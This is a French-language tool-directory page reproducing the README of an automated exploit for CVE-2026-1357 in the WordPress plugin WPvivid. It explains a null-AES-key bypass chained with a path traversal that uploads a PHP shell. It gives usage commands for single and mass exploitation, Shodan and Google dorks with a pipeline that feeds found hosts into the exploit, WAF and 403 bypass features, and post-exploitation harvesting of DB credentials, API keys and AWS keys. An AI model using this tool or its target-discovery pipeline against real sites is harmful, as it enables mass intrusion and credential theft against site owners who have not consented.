Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1357-POC — Outil d'exploitation automatisé pour CVE-2026-1357, une RCE non authentifiée dans WPvivid Backup & Migration. Analyse les cibles WordPress, contourne WAF/403, téléverse un shell via un path traversal, et exécute une reconnaissance post-exploitation avec génération de rapport. | Kitploit
Outils/GitHubGitHub/cybertechajju/cve-2026-1357-poc
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesPost-ExploitationContournement de WAFTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

Outil d'exploitation automatisé pour CVE-2026-1357, une RCE non authentifiée dans WPvivid Backup & Migration. Analyse les cibles WordPress, contourne WAF/403, téléverse un shell via un path traversal, et exécute une reconnaissance post-exploitation avec génération de rapport.

Voir le dépôt
81il y a 6 moisPas encore vérifié
Partager

CVE-2026-1357 — WPvivid Backup & Migration RCE

Crédit CVE : Lucas Montes (NiRoX)
Outil par : CyberTechAjju
CVSS : 9.8 (Critique) | Affecté : ≤ 0.9.123 | Corrigé : 0.9.124


⚠️ Avertissement

Pour tests de sécurité autorisés uniquement. L'accès non autorisé à des systèmes est illégal.


Aperçu

RCE non authentifiée dans WPvivid Backup & Migration via deux bugs enchaînés :

  1. Crypto Fail-Open — openssl_private_decrypt() retourne false sur une clé invalide → phpseclib v1 la traite comme une clé AES à octets nuls → l'attaquant chiffre avec 16 octets nuls
  2. Traversée de chemin — champ name non assaini → ../uploads/shell.php échappe au répertoire de sauvegarde

Contrainte : Exploitable uniquement lorsque wpvivid_api_token est généré et non expiré.


Fonctionnalités


Installation

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

Utilisation

root@kitploit:~
# Scan uniquement (détecter WordPress + WPvivid + version)
python3 cve_2026_1357.py -u http://target.com

# Scan + Exploitation + Post-exploitation automatique
python3 cve_2026_1357.py -u http://target.com --exploit

# Exploitation sans reconnaissance post-exploitation
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# Scan de masse avec rapport
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Via proxy Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# Mode payload uniquement
python3 cve_2026_1357.py -u http://x --payload-only

Toutes les options

root@kitploit:~
-u, --url         URL cible unique
-l, --list        Fichier avec les URLs (une par ligne)
--exploit         Activer le mode exploitation
--shell NAME      Nom du fichier shell (défaut : pwn_remote.php)
--no-post         Ignorer la reconnaissance post-exploitation
--report          Générer un rapport PoC Markdown
--report-dir DIR  Répertoire de sortie du rapport
-t, --threads N   Threads concurrents (défaut : 5)
--timeout SECS    Délai d'expiration de la requête (défaut : 10)
--proxy URL       Proxy HTTP pour Burp
--payload-only    Afficher le payload base64 et quitter
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

Découverte de cibles (Dorks)

Voir dorks.md pour la liste complète. Exemples rapides :

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

Fichiers

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← Outil principal (scanner + exploit + post-exploitation)
├── dorks.md            ← Dorks Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt    ← Dépendances Python
├── .gitignore
└── README.md           ← Ce fichier

Crédits

Lucas Montes (NiRoX) — Découverte de la CVE
CyberTechAjju — Outil d'exploitation

Télécharger l’outil
FonctionnalitéDescription
🔍 Détection automatiqueEmpreinte WordPress + plugin WPvivid + version
🛡️ Contournement WAFRotation du User-Agent, usurpation d'en-têtes, astuces d'encodage
🔓 Contournement 403X-Forwarded-For, X-Original-URL, normalisation de chemin, double encodage
💀 Exploitation automatiquePayload AES à clé nulle + téléversement par traversée de chemin
📋 Post-exploitationExécute automatiquement 20+ commandes de reconnaissance (id, whoami, passwd, wp-config, SUID, etc.)
🔑 Extracteur de donnéesRecherche les identifiants DB, clés API, mots de passe, clés AWS dans la sortie
📊 Génération de rapportRapport PoC Markdown avec preuves d'exploitation complètes
⚡ Scan de masseMultithread avec support proxy/Burp